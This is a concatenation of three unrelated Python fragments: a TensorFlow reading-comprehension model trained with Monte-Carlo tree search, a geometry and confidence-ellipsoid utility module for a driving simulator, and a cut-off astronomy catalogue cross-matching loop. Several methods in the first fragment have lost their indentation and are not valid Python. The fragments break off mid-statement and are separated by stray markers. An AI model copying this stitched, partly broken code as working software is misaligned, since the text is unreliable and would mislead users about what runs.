"2009/7/8 | |
<gh_stars>1-10
# -*- coding:utf8 -*-
# ==============================================================================
# Copyright 2017 lizhaohui.com, Inc. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
This module implements the reading comprehension models based on:
Reinforcement Learning and Monte-Carlo Tree Search
Note that we use Pointer Network for the decoding stage of both models.
"""
import os
import time
import logging
import json
from mctree import search_tree
import numpy as np
import tensorflow as tf
from utils import compute_bleu_rouge
from utils import normalize
from layers.basic_rnn import rnn
from layers.match_layer import MatchLSTMLayer
from layers.match_layer import AttentionFlowMatchLayer
from layers.pointer_net import PointerNetDecoder
from pmctree import PSCHTree
class MCSTmodel(object):
"""
Implements the main reading comprehension model.
"""
    def __init__(self, vocab, args):
        """Store configuration and hyper-parameters.

        The TensorFlow graph is NOT built here; callers must invoke
        _build_graph() explicitly (the call below is commented out).

        :param vocab: vocabulary object exposing size(), embed_dim and embeddings
        :param args: parsed command-line arguments carrying the hyper-parameters
        """
        # logging
        self.args = args
        self.logger = logging.getLogger("brc")
        # basic config
        self.algo = args.algo
        self.hidden_size = args.hidden_size
        self.optim_type = args.optim
        self.learning_rate = args.learning_rate
        self.weight_decay = args.weight_decay
        self.use_dropout = args.dropout_keep_prob < 1
        # length limit
        self.max_p_num = args.max_p_num
        self.max_p_len = args.max_p_len
        self.max_q_len = args.max_q_len
        #self.max_a_len = args.max_a_len
        # NOTE(review): hard-coded override of the command-line value — confirm
        # this cap of 20 answer tokens is intentional.
        self.max_a_len = 20
        #test paras
        # Experimental MCTS settings: number of simulations and exploration weight.
        self.search_time = 3000
        self.beta = 100.0
        # the vocab
        self.vocab = vocab
        #self._build_graph()
    def _build_graph(self):
        """
        Builds the computation graph with Tensorflow.

        Creates the session, then assembles the graph stage by stage; the
        order matters because each stage consumes tensors created by the
        previous one.
        """
        # session info
        sess_config = tf.ConfigProto()
        # Grow GPU memory on demand instead of grabbing it all up front.
        sess_config.gpu_options.allow_growth = True
        self.sess = tf.Session(config=sess_config)
        start_t = time.time()
        self._setup_placeholders()
        self._embed()
        self._encode()
        self._initstate()
        self._action_frist()
        self._action()
        self._compute_loss()
        #param_num = sum([np.prod(self.sess.run(tf.shape(v))) for v in self.all_params])
        #self.logger.info('There are {} parameters in the model'.format(param_num))
        self.saver = tf.train.Saver()
        self.sess.run(tf.global_variables_initializer())
        self.logger.info('Time to build graph: {} s'.format(time.time() - start_t))
    def _setup_placeholders(self):
        """
        Placeholders for batch inputs and for the MCTS training targets.
        """
        self.p = tf.placeholder(tf.int32, [None, None])    # passage token ids [batch, p_len]
        self.q = tf.placeholder(tf.int32, [None, None])    # question token ids [batch, q_len]
        self.p_length = tf.placeholder(tf.int32, [None])   # true passage lengths
        self.q_length = tf.placeholder(tf.int32, [None])   # true question lengths
        self.start_label = tf.placeholder(tf.int32, [None])  # gold answer start positions
        self.end_label = tf.placeholder(tf.int32, [None])    # gold answer end positions
        self.dropout_keep_prob = tf.placeholder(tf.float32)
        #test
        self.p_words_id = tf.placeholder(tf.int32, [None])      # flat ids of all passage words
        self.candidate_id = tf.placeholder(tf.int32, [None])    # ids of still-selectable words
        #self.words = tf.placeholder(tf.float32, [None, None])
        self.selected_id_list = tf.placeholder(tf.int32, [None])  # ids already chosen, in order
        self.policy = tf.placeholder(tf.float32, [1, None]) # policy
        self.v = tf.placeholder(tf.float32, [1, 1]) # value
    def _embed(self):
        """
        The embedding layer, question and passage share embeddings.
        """
        #with tf.device('/cpu:0'), tf.variable_scope('word_embedding'):
        with tf.variable_scope('word_embedding'):
            # Initialized from pre-trained vectors and fine-tuned during training.
            self.word_embeddings = tf.get_variable(
                'word_embeddings',
                shape=(self.vocab.size(), self.vocab.embed_dim),
                initializer=tf.constant_initializer(self.vocab.embeddings),
                trainable=True
            )
            self.p_emb = tf.nn.embedding_lookup(self.word_embeddings, self.p)
            self.q_emb = tf.nn.embedding_lookup(self.word_embeddings, self.q)
    def _encode(self):
        """
        Employs two Bi-LSTMs to encode passage and question separately.
        """
        with tf.variable_scope('passage_encoding'):
            # Keep the per-token passage states; the final state is discarded.
            self.p_encodes, _ = rnn('bi-lstm', self.p_emb, self.p_length, self.hidden_size)
        with tf.variable_scope('question_encoding'):
            # Keep only the question's final state as a fixed-size summary.
            _, self.sep_q_encodes = rnn('bi-lstm', self.q_emb, self.q_length, self.hidden_size)
        if self.use_dropout:
            self.p_encodes = tf.nn.dropout(self.p_encodes, self.dropout_keep_prob)
            self.sep_q_encodes = tf.nn.dropout(self.sep_q_encodes, self.dropout_keep_prob)
    def _initstate(self):
        """
        Creates the trainable projection weights and derives the decoder's
        initial LSTM state (cell + hidden) from the question encoding.

        V   : bilinear scoring matrix used by _action/_action_frist
        W,W_b: value-head weights producing a scalar state value
        V_c,V_h: projections from question summary to LSTM cell/hidden state
        """
        self.V = tf.Variable(tf.random_uniform([self.hidden_size*2, self.hidden_size * 2], -1. / self.hidden_size,1. / self.hidden_size))
        self.W = tf.Variable(tf.random_uniform([self.hidden_size * 2, 1], -1. / self.hidden_size, 1. / self.hidden_size))
        self.W_b = tf.Variable(tf.random_uniform([1, 1], -1. / self.hidden_size, 1. / self.hidden_size))
        self.V_c = tf.Variable(tf.random_uniform([self.hidden_size*2, self.hidden_size], -1. / self.hidden_size, 1. / self.hidden_size))
        self.V_h = tf.Variable(tf.random_uniform([self.hidden_size*2, self.hidden_size], -1. / self.hidden_size, 1. / self.hidden_size))
        # Initial LSTM state: sigmoid-squashed projections of the question summary,
        # concatenated because BasicLSTMCell below uses state_is_tuple=False.
        self.q_state_c = tf.sigmoid(tf.matmul(self.sep_q_encodes, self.V_c))
        self.q_state_h = tf.sigmoid(tf.matmul(self.sep_q_encodes, self.V_h))
        self.q_state = tf.concat([self.q_state_c, self.q_state_h], 1)
        # Flatten per-token passage encodings so words can be gathered by flat id.
        self.words = tf.reshape(self.p_encodes,[-1,self.hidden_size*2])
        self.words_list = tf.gather(self.words, self.p_words_id) # all words in a question doc
    def _action_frist(self):
        """
        Select the first word: policy and value for the initial (empty) state.

        NOTE: the "frist" spelling is kept because _build_graph calls the
        method under this name.
        """
        #self.candidate = tf.reshape(self.p_emb,[-1,self.hidden_size*2])
        # Bilinear score of every passage word against the question state,
        # normalized into the first-step policy distribution.
        self.logits_first = tf.reshape(tf.matmul(tf.matmul(self.words_list, self.V), tf.transpose(self.q_state)), [-1])
        self.prob_first = tf.nn.softmax(self.logits_first)
        self.prob_id_first = tf.argmax(self.prob_first)
        # Value head: scalar estimate in (0, 1) for the initial state.
        self.value_first = tf.sigmoid(tf.reshape(tf.matmul(self.q_state, self.W), [1, 1]) + self.W_b) # [1,1]
    def _action(self):
        """
        Policy/value for a non-empty prefix: runs an LSTM over the words
        selected so far (seeded with the question state) and scores the
        remaining candidate words against the resulting state.

        (The original docstring mentioned a match layer; no match layer is
        used here — the tensors below only involve the selection LSTM.)
        """
        self.candidate = tf.gather(self.words_list, self.candidate_id)
        self.selected_list = tf.gather(self.words_list, self.selected_id_list)
        # Batch of one sequence: the ordered encodings of the selected words.
        self.input = tf.reshape(self.selected_list, [1, -1, self.hidden_size*2])
        rnn_cell = tf.contrib.rnn.BasicLSTMCell(num_units=self.hidden_size, state_is_tuple=False)
        _, self.states = tf.nn.dynamic_rnn(rnn_cell, self.input, initial_state=self.q_state, dtype=tf.float32) # [1, dim]
        # Bilinear score of each candidate against the current LSTM state.
        self.logits = tf.reshape(tf.matmul(tf.matmul(self.candidate, self.V), tf.transpose(self.states)), [-1])
        self.prob = tf.nn.softmax(self.logits)
        self.prob_id = tf.argmax(self.prob)
        self.value = tf.sigmoid(tf.reshape(tf.matmul(self.states, self.W), [1, 1]) + self.W_b) # [1,1]
def value_function(self, words_list):
words_list = map(eval, words_list)
#print words_list
if len(words_list) == 0:
value_p = self.sess.run(self.value_first, feed_dict=self.feed_dict)
else:
feed_dict = dict({self.selected_id_list: words_list}.items() + self.feed_dict.items())
value_p = self.sess.run(self.value, feed_dict=feed_dict)
return value_p
def get_policy(self, words_list, l_passages):
max_id = float('-inf')
policy_c_id = []
words_list = map(eval, words_list)
for can in words_list:
max_id = max(can,max_id)
for idx in range(l_passages):
if idx > max_id:
policy_c_id.append(idx)
if len(words_list) == 0:
c_pred = self.sess.run(self.prob_first, feed_dict=self.feed_dict)
else:
feed_dict = dict({self.selected_id_list: words_list, self.candidate_id: policy_c_id}.items() + self.feed_dict.items())
c_pred = self.sess.run(self.prob, feed_dict=feed_dict)
return policy_c_id, c_pred
    def _decode(self):
        """
        Employs Pointer Network to get the probs of each position
        to be the start or end of the predicted answer.
        Note that we concat the fuse_p_encodes for the passages in the same document.
        And since the encodes of queries in the same document is same, we select the first one.

        NOTE(review): self.fuse_p_encodes is not created by any method in this
        class and _build_graph never calls _decode — this looks like leftover
        code from the match-layer model; confirm before relying on it.
        """
        with tf.variable_scope('same_question_concat'):
            batch_size = tf.shape(self.start_label)[0]
            # Merge all passage encodings of one question into a single sequence.
            concat_passage_encodes = tf.reshape(
                self.fuse_p_encodes,
                [batch_size, -1, 2 * self.hidden_size]
            )
            # Every passage of a question shares the question encoding; keep one.
            no_dup_question_encodes = tf.reshape(
                self.sep_q_encodes,
                [batch_size, -1, tf.shape(self.sep_q_encodes)[1], 2 * self.hidden_size]
            )[0:, 0, 0:, 0:]
        decoder = PointerNetDecoder(self.hidden_size)
        self.start_probs, self.end_probs = decoder.decode(concat_passage_encodes,
                                                          no_dup_question_encodes)
    def _compute_loss(self):
        """
        The loss function: squared error between the predicted value and the
        search target `v`, minus the policy-weighted log-probabilities
        (a cross-entropy term against the MCTS visit distribution).
        One loss/optimizer pair is built for the first selection step and one
        for all subsequent steps.
        """
        # Probabilities are clipped away from 0 so log() stays finite.
        self.loss_first = tf.contrib.losses.mean_squared_error(self.v, self.value_first) - tf.matmul(self.policy, tf.reshape(
            tf.log(tf.clip_by_value(self.prob_first, 1e-30, 1.0)), [-1, 1]))
        self.optimizer_first = tf.train.AdagradOptimizer(self.learning_rate).minimize(self.loss_first)
        self.loss = tf.contrib.losses.mean_squared_error(self.v, self.value) - tf.matmul(self.policy, tf.reshape(
            tf.log(tf.clip_by_value(self.prob, 1e-30, 1.0)), [-1, 1]))
        self.optimizer = tf.train.AdagradOptimizer(self.learning_rate).minimize(self.loss)
        self.all_params = tf.trainable_variables()
def _create_train_op(self):
"""
Selects the training algorithm and creates a train operation with it
"""
if self.optim_type == 'adagrad':
self.optimizer = tf.train.AdagradOptimizer(self.learning_rate)
elif self.optim_type == 'adam':
self.optimizer = tf.train.AdamOptimizer(self.learning_rate)
elif self.optim_type == 'rprop':
self.optimizer = tf.train.RMSPropOptimizer(self.learning_rate)
elif self.optim_type == 'sgd':
self.optimizer = tf.train.GradientDescentOptimizer(self.learning_rate)
else:
raise NotImplementedError('Unsupported optimizer: {}'.format(self.optim_type))
self.train_op = self.optimizer.minimize(self.loss)
    def _train_epoch_new(self, pmct, train_batches, batch_size, dropout_keep_prob):
        """
        Trains the model for a single epoch via the parallel MCTS helper.
        Args:
            pmct: PSCHTree instance that performs the batched tree search
            batch_size: unused in this body (kept for interface parity)
            train_batches: iterable batch data for training
            dropout_keep_prob: float value indicating dropout keep probability
        """
        for bitx, batch in enumerate(train_batches, 1):
            print '------ Batch Question: ' + str(bitx)
            '''
            feed_dict = {self.p: batch['passage_token_ids'],
                         self.q: [batch['question_token_ids']],
                         self.p_length: batch['passage_length'],
                         self.q_length: [batch['question_length']],
                         self.dropout_keep_prob: dropout_keep_prob}
            '''
            pred_answers = {}
            #print str(ref_answers)
            listSelectedSet = []
            p_data = []
            # Package everything the search tree needs for this batch of questions.
            tree_batch = {
                'tree_ids': batch['question_ids'],
                'question_type': batch['question_types'],
                'root_tokens': batch['question_token_ids'],
                'q_length': batch['question_length'],
                'candidates': batch['passage_token_ids'],
                'p_length': batch['passage_length'],
                'ref_answers': batch['ref_answers'],
                'mcst_model': self
            }
            feed_dict = {}
            pmct.feed_in_batch(tree_batch, 3, feed_dict)
            loss = pmct.tree_search()
        # NOTE(review): as written this returns only the last batch's loss and
        # raises NameError on an empty iterator; indentation was lost in this
        # copy, so confirm the return was not intended inside the loop.
        return loss
def _train_epoch(self, train_batches, dropout_keep_prob):
"""
Trains the model for a single epoch.
Args:
train_batches: iterable batch data for training
dropout_keep_prob: float value indicating dropout keep probability
"""
total_num, total_loss = 0, 0
log_every_n_batch, n_batch_loss = 3, 0
for bitx, batch in enumerate(train_batches, 1):
print '------ Batch Question: ' + str(bitx)
#print 'each passage len: '
#print batch['padded_p_len']
p_words_id = [] #all words id
p_words_list = [] #all words except padding
p_words_list_all = []
l_passages = 1 # include end_pad
n = 0
for l in batch['passage_length']:
l_passages += l
temp_id = [i + n * (int(batch['padded_p_len'])) for i in range(l)]
#print temp
temp_w = batch['passage_token_ids'][n][:l]
temp_all = batch['passage_token_ids'][n]
n += 1
p_words_id += temp_id
p_words_list += temp_w
p_words_list_all += temp_all
p_words_list.append(0)
self.end_pad = []
self.end_pad.append(p_words_id[-1] + 1)
p_words_id.append(p_words_id[-1] + 1)
#print 'end_pad: '
#print self.end_pad
#print p_words_list
#print p_words_id
#print len(p_words_list)
#print p_words_list_all
#print len(p_words_list_all)
self.max_a_len = min(self.max_a_len, l_passages)
self.feed_dict = {self.p: batch['passage_token_ids'],
self.q: [batch['question_token_ids'][0]],
self.p_length: batch['passage_length'],
self.q_length: [batch['question_length'][0]],
self.start_label: batch['start_id'],
self.end_label: batch['end_id'],
self.p_words_id: p_words_id,
self.dropout_keep_prob: dropout_keep_prob}
#print "question_length: " + str(batch['question_length'])
#print "passage_length: " + str(batch['passage_length'])
pred_answers, ref_answers = [], []
for sample in batch['raw_data']:
if 'answers' in sample:
ref_answers.append({'question_id': sample['question_id'],
'question_type': sample['question_type'],
'answers': sample['answers'],
'entity_answers': [[]],
'yesno_answers': []})
#print 'answers: '
#print str(sample['answers'])
#print 'ref_answers: '
#print ref_answers
listSelectedSet = []
p_data = []
start_node = 'question_'+ str(batch['question_ids'][0])
mcts_tree = search_tree(self, batch['question_ids'][0], self.max_a_len, l_passages, p_words_list, ref_answers, self.vocab)
#for t in xrange(3):
for t in xrange(self.max_a_len):
#print '-------------'+str(t)+'------------'
mcts_tree.search(start_node)
tmp_policy = mcts_tree.get_ppolicy(start_node)
#print 'tmp_policy.values(): '
#print tmp_policy.values()
#print 'sum(tmp_policy.values()): '
#print sum(tmp_policy.values())
prob, select_doc_id, start_node = mcts_tree.take_action(start_node)
p_data.append(prob)
listSelectedSet.append(select_doc_id)
if select_doc_id in self.end_pad:
print 'break!!!!!!!!!!!'
break
listSelectedSet_words = []
listSelectedSet = map(eval, listSelectedSet)
for idx in listSelectedSet:
listSelectedSet_words.append(p_words_list[idx])
#print 'listSelectedSet:'
#print listSelectedSet
#print 'listSelectedSet_words: '
#print listSelectedSet_words
for sample in batch['raw_data']:
#print 'str:'
strr123 = self.vocab.recover_from_ids(listSelectedSet_words, 0)
#print strr123
pred_answers.append({'question_id': sample['question_id'],
'question_type': sample['question_type'],
'answers': [''.join(strr123)],
'entity_answers': [[]],
'yesno_answers': []})
#print | |
# Source repository: rvalienter90/highway-env (scaffolding artifact converted to a comment)
import copy
import importlib
import itertools
import math
from typing import Tuple, Dict, Callable, List, Optional, Union, Sequence
import matplotlib.pyplot as plt
from PIL import Image
from PIL import ImageDraw
import numpy as np
# Useful types
Vector = Union[np.ndarray, Sequence[float]]
Matrix = Union[np.ndarray, Sequence[Sequence[float]]]
Interval = Union[np.ndarray,
Tuple[Vector, Vector],
Tuple[Matrix, Matrix],
Tuple[float, float],
List[Vector],
List[Matrix],
List[float]]
def do_every(duration: float, timer: float) -> bool:
    """Return True once *timer* has grown strictly past *duration*."""
    return timer > duration
def lmap(v: float, x: Interval, y: Interval) -> float:
    """Linearly map value ``v`` from source range ``x`` onto target range ``y``."""
    # Same operation order as a direct one-liner, just with named spans.
    span_y = y[1] - y[0]
    span_x = x[1] - x[0]
    return y[0] + (v - x[0]) * span_y / span_x
def class_from_path(path: str) -> Callable:
    """Resolve a dotted ``package.module.Name`` path to the named attribute."""
    module_name, _, attribute_name = path.rpartition(".")
    module = importlib.import_module(module_name)
    return getattr(module, attribute_name)
def constrain(x: float, a: float, b: float) -> float:
    """Clamp ``x`` into the closed interval [a, b].

    NOTE(review): for a scalar ``x`` this returns a numpy scalar
    (``np.float64``, a ``float`` subclass), not an ``ndarray`` — the return
    annotation is adjusted accordingly.
    """
    return np.clip(x, a, b)
def not_zero(x: float, eps: float = 1e-2) -> float:
    """Return ``x`` pushed away from zero to at least ``eps`` in magnitude.

    Values with ``|x| <= eps`` are replaced by ``+eps`` (when x >= 0)
    or ``-eps`` (when x < 0), preserving sign.
    """
    if abs(x) > eps:
        return x
    return eps if x >= 0 else -eps
def wrap_to_pi(x: float) -> float:
    """Wrap an angle (radians) into the interval [-pi, pi)."""
    full_turn = 2 * np.pi
    return (x + np.pi) % full_turn - np.pi
def point_in_rectangle(point: Vector, rect_min: Vector, rect_max: Vector) -> bool:
    """
    Check if a point is inside an axis-aligned rectangle.

    :param point: a point (x, y)
    :param rect_min: x_min, y_min
    :param rect_max: x_max, y_max
    """
    inside_x = rect_min[0] <= point[0] <= rect_max[0]
    inside_y = rect_min[1] <= point[1] <= rect_max[1]
    return inside_x and inside_y
def point_in_rotated_rectangle(point: np.ndarray, center: np.ndarray, length: float, width: float, angle: float) \
        -> bool:
    """
    Check if a point is inside a rotated rectangle.

    Rotates the point into the rectangle's own frame, then performs an
    axis-aligned containment test (inlined here rather than delegating).

    :param point: a point
    :param center: rectangle center
    :param length: rectangle length
    :param width: rectangle width
    :param angle: rectangle angle [rad]
    :return: is the point inside the rectangle
    """
    cos_a, sin_a = np.cos(angle), np.sin(angle)
    rotation = np.array([[cos_a, -sin_a], [sin_a, cos_a]])
    rx, ry = rotation.dot(point - center)
    return -length / 2 <= rx <= length / 2 and -width / 2 <= ry <= width / 2
def point_in_ellipse(point: Vector, center: Vector, angle: float, length: float, width: float) -> bool:
    """
    Check if a point is inside an ellipse.

    :param point: a point
    :param center: ellipse center
    :param angle: ellipse main axis angle
    :param length: ellipse big axis
    :param width: ellipse small axis
    :return: is the point inside the ellipse
    """
    c, s = np.cos(angle), np.sin(angle)
    # np.matrix is deprecated by NumPy; a plain 2x2 ndarray produces the same
    # rotated coordinates (shape differs but the scalar sum below is identical).
    r = np.array([[c, -s], [s, c]])
    ru = r.dot(point - center)
    return np.sum(np.square(ru / np.array([length, width]))) < 1
def rotated_rectangles_intersect(rect1: Tuple[Vector, float, float, float],
                                 rect2: Tuple[Vector, float, float, float]) -> bool:
    """
    Do two rotated rectangles intersect?

    Symmetric corner test: either rectangle owning a corner of the other
    counts as an intersection.

    :param rect1: (center, length, width, angle)
    :param rect2: (center, length, width, angle)
    :return: do they?
    """
    if has_corner_inside(rect1, rect2):
        return True
    return has_corner_inside(rect2, rect1)
def has_corner_inside(rect1: Tuple[Vector, float, float, float],
                      rect2: Tuple[Vector, float, float, float]) -> bool:
    """
    Check if rect1 has a corner inside rect2.

    Tests the center, edge midpoints and the four corners of rect1
    (9 candidate points) against rect2.

    :param rect1: (center, length, width, angle)
    :param rect2: (center, length, width, angle)
    """
    (c1, l1, w1, a1) = rect1
    (c2, l2, w2, a2) = rect2
    c1 = np.array(c1)
    half_len = np.array([l1 / 2, 0])
    half_wid = np.array([0, w1 / 2])
    # Candidate points in rect1's local (unrotated) frame.
    candidates = np.array([[0, 0],
                           -half_len, half_len, -half_wid, half_wid,
                           -half_len - half_wid, -half_len + half_wid,
                           +half_len - half_wid, +half_len + half_wid])
    cos_a, sin_a = np.cos(a1), np.sin(a1)
    rotation = np.array([[cos_a, -sin_a], [sin_a, cos_a]])
    rotated = rotation.dot(candidates.transpose()).transpose()
    return any(point_in_rotated_rectangle(c1 + np.squeeze(pt), c2, l2, w2, a2)
               for pt in rotated)
def project_polygon(polygon: Vector, axis: Vector) -> Tuple[float, float]:
    """Project every polygon vertex onto *axis*; return (min, max) projections.

    An empty polygon yields (None, None), matching the incremental scan
    this replaces.
    """
    projections = [vertex.dot(axis) for vertex in polygon]
    if not projections:
        return None, None
    return min(projections), max(projections)
def interval_distance(min_a: float, max_a: float, min_b: float, max_b: float):
    """
    Calculate the distance between [minA, maxA] and [minB, maxB]
    The distance will be negative if the intervals overlap
    """
    if min_a < min_b:
        return min_b - max_a
    return min_a - max_b
def are_polygons_intersecting(a: Vector, b: Vector,
                              displacement_a: Vector, displacement_b: Vector) \
        -> Tuple[bool, bool, Optional[np.ndarray]]:
    """
    Checks if the two polygons are intersecting.
    See https://www.codeproject.com/Articles/15573/2D-Polygon-Collision-Detection
    :param a: polygon A, as a list of [x, y] points
    :param b: polygon B, as a list of [x, y] points
    :param displacement_a: velocity of the polygon A
    :param displacement_b: velocity of the polygon B
    :return: are intersecting, will intersect, translation vector
    """
    # Separating Axis Theorem: test every edge normal of both polygons;
    # a single axis with a positive gap proves non-intersection.
    intersecting = will_intersect = True
    min_distance = np.inf
    translation, translation_axis = None, None
    for polygon in [a, b]:
        # Consecutive vertex pairs define the polygon edges.
        # NOTE(review): assumes the polygon is closed (last vertex repeats
        # the first), so zip(polygon, polygon[1:]) covers every edge.
        for p1, p2 in zip(polygon, polygon[1:]):
            # Outward-facing normal of edge (p1, p2), normalised.
            normal = np.array([-p2[1] + p1[1], p2[0] - p1[0]])
            normal /= np.linalg.norm(normal)
            min_a, max_a = project_polygon(a, normal)
            min_b, max_b = project_polygon(b, normal)
            if interval_distance(min_a, max_a, min_b, max_b) > 0:
                intersecting = False
            # Extend A's projected interval by the relative displacement to
            # predict whether the polygons will intersect after moving.
            velocity_projection = normal.dot(displacement_a - displacement_b)
            if velocity_projection < 0:
                min_a += velocity_projection
            else:
                max_a += velocity_projection
            distance = interval_distance(min_a, max_a, min_b, max_b)
            if distance > 0:
                will_intersect = False
            if not intersecting and not will_intersect:
                break
            # Track the axis of minimum penetration for the MTV
            # (minimum translation vector) returned below.
            if abs(distance) < min_distance:
                min_distance = abs(distance)
                d = a[:-1].mean(axis=0) - b[:-1].mean(axis=0)  # center difference
                translation_axis = normal if d.dot(normal) > 0 else -normal
    if will_intersect:
        translation = min_distance * translation_axis
    return intersecting, will_intersect, translation
def confidence_ellipsoid(data: Dict[str, np.ndarray], lambda_: float = 1e-5, delta: float = 0.1, sigma: float = 0.1,
                         param_bound: float = 1.0) -> Tuple[np.ndarray, np.ndarray, float]:
    """
    Compute a confidence ellipsoid over the parameter theta, where y = theta^T phi
    :param data: a dictionary {"features": [phi_0,...,phi_N], "outputs": [y_0,...,y_N]}
    :param lambda_: l2 regularization parameter
    :param delta: confidence level
    :param sigma: noise covariance
    :param param_bound: an upper-bound on the parameter norm
    :return: estimated theta, Gramian matrix G_N_lambda, radius beta_N
    """
    phi = np.array(data["features"])
    y = np.array(data["outputs"])
    # Regularised Gramian: (1/sigma) * Phi^T Phi + lambda * I
    g_n_lambda = 1/sigma * np.transpose(phi) @ phi + lambda_ * np.identity(phi.shape[-1])
    # Ridge-regression estimate of theta.
    theta_n_lambda = np.linalg.inv(g_n_lambda) @ np.transpose(phi) @ y / sigma
    d = theta_n_lambda.shape[0]
    # Confidence radius: self-normalised bound term plus regularisation term.
    beta_n = np.sqrt(2*np.log(np.sqrt(np.linalg.det(g_n_lambda) / lambda_ ** d) / delta)) + \
        np.sqrt(lambda_*d) * param_bound
    return theta_n_lambda, g_n_lambda, beta_n
def confidence_polytope(data: dict, parameter_box: np.ndarray) -> Tuple[np.ndarray, np.ndarray, np.ndarray, float]:
    """
    Compute a confidence polytope over the parameter theta, where y = theta^T phi
    :param data: a dictionary {"features": [phi_0,...,phi_N], "outputs": [y_0,...,y_N]}
    :param parameter_box: a box [theta_min, theta_max] containing the parameter theta
    :return: estimated theta, polytope vertices, Gramian matrix G_N_lambda, radius beta_N
    """
    param_bound = np.amax(np.abs(parameter_box))
    theta_n_lambda, g_n_lambda, beta_n = confidence_ellipsoid(data, param_bound=param_bound)
    # Eigendecomposition of the Gramian gives the ellipsoid's principal axes.
    values, pp = np.linalg.eig(g_n_lambda)
    radius_matrix = np.sqrt(beta_n) * np.linalg.inv(pp) @ np.diag(np.sqrt(1 / values))
    # All sign combinations (+/-1)^d enumerate the bounding polytope vertices.
    h = np.array(list(itertools.product([-1, 1], repeat=theta_n_lambda.shape[0])))
    d_theta = np.array([radius_matrix @ h_k for h_k in h])
    # Clip the parameter and confidence region within the prior parameter box.
    theta_n_lambda = np.clip(theta_n_lambda, parameter_box[0], parameter_box[1])
    for k, _ in enumerate(d_theta):
        d_theta[k] = np.clip(d_theta[k], parameter_box[0] - theta_n_lambda, parameter_box[1] - theta_n_lambda)
    return theta_n_lambda, d_theta, g_n_lambda, beta_n
def is_valid_observation(y: np.ndarray, phi: np.ndarray, theta: np.ndarray, gramian: np.ndarray,
                         beta: float, sigma: float = 0.1) -> bool:
    """
    Check if a new observation (phi, y) is valid according to a confidence ellipsoid on theta.

    :param y: observation
    :param phi: feature
    :param theta: estimated parameter
    :param gramian: Gramian matrix
    :param beta: ellipsoid radius
    :param sigma: noise covariance
    :return: validity of the observation
    """
    prediction = np.tensordot(theta, phi, axes=[0, 0])
    residual = np.linalg.norm(y - prediction)
    # Spectral bound: largest feature eigenvalue vs smallest Gramian eigenvalue.
    feature_eigvals, _ = np.linalg.eig(phi.transpose() @ phi)
    gramian_eigvals, _ = np.linalg.eig(gramian)
    error_bound = np.sqrt(np.amax(feature_eigvals) / np.amin(gramian_eigvals)) * beta + sigma
    return residual < error_bound
def is_consistent_dataset(data: dict, parameter_box: np.ndarray = None) -> bool:
    """
    Check whether a dataset {phi_n, y_n} is consistent.

    The last observation should be in the confidence ellipsoid obtained by
    the N-1 first observations.

    :param data: a dictionary {"features": [phi_0,...,phi_N], "outputs": [y_0,...,y_N]}
    :param parameter_box: a box [theta_min, theta_max] containing the parameter theta
    :return: consistency of the dataset
    """
    training = copy.deepcopy(data)
    held_out_y = training["outputs"].pop(-1)
    held_out_phi = training["features"].pop(-1)
    held_out_y = np.array(held_out_y)[..., np.newaxis]
    held_out_phi = np.array(held_out_phi)[..., np.newaxis]
    # With no remaining history there is nothing to contradict.
    if not (training["outputs"] and training["features"]):
        return True
    theta, _, gramian, beta = confidence_polytope(training, parameter_box=parameter_box)
    return is_valid_observation(held_out_y, held_out_phi, theta, gramian, beta)
def near_split(x, num_bins=None, size_bins=None):
"""
Split a number into several bins with near-even distribution.
You can either set the number of bins, or their size.
The sum of bins always equals the total.
:param x: number to split
:param num_bins: number of bins
:param size_bins: size of bins
:return: list of bin sizes
"""
if num_bins:
quotient, remainder = divmod(x, num_bins)
return [quotient + 1] * remainder + [quotient] * (num_bins - remainder)
elif size_bins:
return near_split(x, num_bins=int(np.ceil(x / | |
are:", amaxsize, bmaxsize)
sys.stdout.flush()
print("Finding unique sets...")
sys.stdout.flush()
alist, blist, agrplen, bgrplen = set_list(ainds, binds, asize, bsize, joint_folder_path)
# The final act of creating island groups is to clear out any sources too
# close to the edge of the catalogue -- defined by its rectangular extend.
# TODO: add flag for allowing the keeping of potentially incomplete islands
# in the main catalogue; here we default to, and only allow, their removal.
passed_check = np.lib.format.open_memmap('{}/group/passed_check.npy'.format(joint_folder_path),
mode='w+', dtype=bool, shape=(alist.shape[1],))
passed_check[:] = 0
failed_check = np.lib.format.open_memmap('{}/group/failed_check.npy'.format(joint_folder_path),
mode='w+', dtype=bool, shape=(alist.shape[1],))
failed_check[:] = 1
islelen = alist.shape[1]
num_good_checks = 0
num_a_failed_checks = 0
num_b_failed_checks = 0
for cnum in range(0, mem_chunk_num):
lowind = np.floor(islelen*cnum/mem_chunk_num).astype(int)
highind = np.floor(islelen*(cnum+1)/mem_chunk_num).astype(int)
indexmap = np.arange(lowind, highind, 1)
alist_small = alist[:, lowind:highind]
agrplen_small = agrplen[lowind:highind]
alist_small = np.asfortranarray(alist_small[:np.amax(agrplen_small), :])
alistunique_flat = np.unique(alist_small[alist_small > -1])
a_ = np.load('{}/con_cat_astro.npy'.format(a_cat_folder_path), mmap_mode='r')[
alistunique_flat]
maparray = -1*np.ones(len(a_full)+1).astype(int)
maparray[alistunique_flat] = np.arange(0, len(a_), dtype=int)
alist_1 = np.asfortranarray(maparray[alist_small.flatten()].reshape(alist_small.shape))
blist_small = blist[:, lowind:highind]
bgrplen_small = bgrplen[lowind:highind]
blist_small = np.asfortranarray(blist_small[:np.amax(bgrplen_small), :])
blistunique_flat = np.unique(blist_small[blist_small > -1])
b_ = np.load('{}/con_cat_astro.npy'.format(b_cat_folder_path), mmap_mode='r')[
blistunique_flat]
maparray = -1*np.ones(len(b_full)+1).astype(int)
maparray[blistunique_flat] = np.arange(0, len(b_), dtype=int)
blist_1 = np.asfortranarray(maparray[blist_small.flatten()].reshape(blist_small.shape))
# Here, since we know no source can be outside of extent, we can simply
# look at whether any source has a sky separation of less than max_sep
# from any of the four lines defining extent in orthogonal sky axes.
for i in range(0, alist_small.shape[1]):
subset = alist_1[:agrplen_small[i], i]
a = a_[subset]
subset = blist_1[:bgrplen_small[i], i]
b = b_[subset]
meets_min_distance = np.zeros(len(a)+len(b), bool)
# Do not check for longitudinal "extent" small separations for cases
# where all 0-360 degrees are included, as this will result in no loss
# of sources from consideration, with the 0->360 wraparound of
# coordinates. In either case if there is a small slice of sky not
